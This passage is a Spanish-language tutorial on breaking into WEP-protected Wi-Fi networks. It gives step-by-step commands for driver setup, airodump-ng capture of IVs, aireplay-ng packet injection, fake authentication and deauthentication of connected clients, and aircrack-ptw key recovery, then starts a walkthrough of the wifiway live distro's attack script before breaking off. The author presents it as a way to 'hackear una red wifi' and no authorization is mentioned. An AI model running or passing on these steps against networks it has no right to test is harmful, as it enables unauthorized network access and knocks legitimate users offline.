Hace varios años no existían tales distros lives, con las facilidades mencionadas antes y cada persona debía ingeniárselas para instalarse todo tipo de programas en el ordenador en su debian o distro Linux que utilizase para poder hackear una red wifi.

Además todo va por línea de comandos y no necesitas un script que te lo haga todo.

Es así como realmente se ven las opciones de cada comando.

Pues bien lo 1º de todo es instalar los drivers de la tarjeta wifi para poder ponerla en modo monitor y además que pueda inyectar.

En este caso yo utilicé una tarjeta con chip atheros y para ello necesitamos instalar los driver madwifi:

Lo primero es estar como root, después cerciorarnos de que nuestra tarjeta esta bien conectada para ello con la orden:

lspci | grep Atheros

Con esta orden nos muestra algo como: Atheros Communications Inc. AR5212/AR5213 Multiprotocol MAC/baseband processor (rev 01)

Actualizamos los paquetes:

apt-get update

Después hemos de instalar las 'headers' del kernel que tengamos instalado:

apt-get install linux-headers-`uname -r`

Donde uname -r nos pone automáticamente la versión del núcleo que tengamos instalada.

Instalamos las demás utilidades:

apt-get install madwifi-source
apt-get install madwifi-tools

Instalamos module-assistant:

apt-get install module-assistant

Ahora lo actualizamos:

m-a prepare

y ahora lo instalamos y compilamos:

m-a a-i madwifi

Cargamos el modulo:

modprobe ath_pci

Hacemos que se cargue permanentemente:

echo ath_pci >> /etc/modules

Vemos si todo es correcto:

iwconfig

Reiniciamos :

/etc/init.d/networking restart

Una vez tenemos la interface preparada vamos a utlizar airodump para capturar los paquetes iv necesarios para sacar la clave:

airodump-ng --ivs -w prueba -c 11 -abg ath0

La opción –ivs es para que descarte los demás tipos de paquetes y solo se interese por ivs

-c 11 para que capture lo que halla en el canal 11

-abg para que capture para todos los modos, a ,b y g

Y al final el nombre de la interfaz

Ahora mientas captura vamos a acelerar el proceso de captura de ivs con aireplay:

aireplay-ng -3 -b [bssid] -h [mac del cliente] ath0

Aireplay también tiene la opcion de desautentificar a un cliente conectado (puede ser utilizado para conseguir el handshake para wpa, o para generar ivs en wep)

aireplay-ng -0 5 -a [bssid] -c [mac del cliente que desconectamos] ath0

En caso de que no hubiera clientes el ataque cambia:

aireplay-ng -1 0 -e [essid] -a [bssid] -h [mac falsa (la nuestra)] ath0

Una vez que conseguimos acelerar la captura de ivs solo queda esperar hasta conseguir unos 50000 ivs y entonces utlizar aircrack:

Aircrack-ptw [ruta del archivo.cap]

Vistas ya todas las medidas de seguridad nos centraremos en los ataques un hackeo de redes wifi.

Ante todo para hacer un buen ataque es primordial conocer la seguridad, ya que ello permitirá que conozcamos las debilidades de dicha protección.

Para ello muestro un ejemplo de como he roto una clave wep en menos de 15 minutos con una tarjeta con chip atheros y driver madwifi, con la distro live wifiway y una antena tipo bote de patatas pringles, utilizando un script automático que ayuda mucho el la elaboración del ataque (utilizando la suite aircrack).

Lo primero es configurar la bios para que arranque desde el cd (saber que también e puede hacer bootable un pen usb y arrancar si la bios lo permite).

Después una vez llegamos a la pantalla de inicio

1º para acceder al menu de las X ponemos startx

2º para ver cual es nuestra interface wireless tipeamos en consola

iwconfig

y nos saldrá algo como

lo        no wireless extensions.

eth0      no wireless extensions.

eth1      no wireless extensions.

wifi0     no wireless extensions.

wlan0 IEEE 802.11g  ESSID:"xxxxx"  Nickname:""

Mode:Managed  Frequency:2.437 GHz  Access Point: xx:01:xx:6x:70:xx

Bit Rate:48 Mb/s   Tx-Power:18 dBm   Sensitivity=1/1

Retry:off   RTS thr:off   Fragment thr:off

Encryption key:58x0-3030-31x3-3x36-4543-33x4-34   Security mode:restricted

Power Management:off

Link Quality=27/70  Signal level=-69 dBm  Noise level=-96 dBm

Rx invalid nwid:124353  Rx invalid crypt:0  Rx invalid frag:0

Tx excessive retries:0  Invalid misc:0   Missed beacon:0

En este caso esta claro que es wlan0

3º una vez estemos dentro lo primero es poner nuestra tarjeta en modo monitor, para ello nos vamos a chipset y elegimos “destruir interface”, nos dará a elegir entre varias, elegimos la que antes nos ponía como wireless en este caso a mí me  sale ath0 , ya que el chip atheros es denominado como ath0, en las intel como eth0, en las Ralink como Rath0 en acx como wlan0 etc..

4º una vez destruida la interface le damos a crear interface (en modo grafico del menú) en modo monitor y nos creará una en modo monitor.

Esto se puede hacer desde consola con la orden ifconfig ath0 mode monitor o con el script airmon-ng.sh, pero de esta forma esta bien

5º ahora escogemos el script airoscrpt.sh y ejecutamos:

6º nos sale una ventana de bienvenida:

7º menu principal de opciones, elegimos scan para ver los puntos de acceso a nuestro alrededor

8º Nos pregunta si queremos detallar un canal específico o un rango o si desconocemos el canal a escanear le damos a todos (opción 1)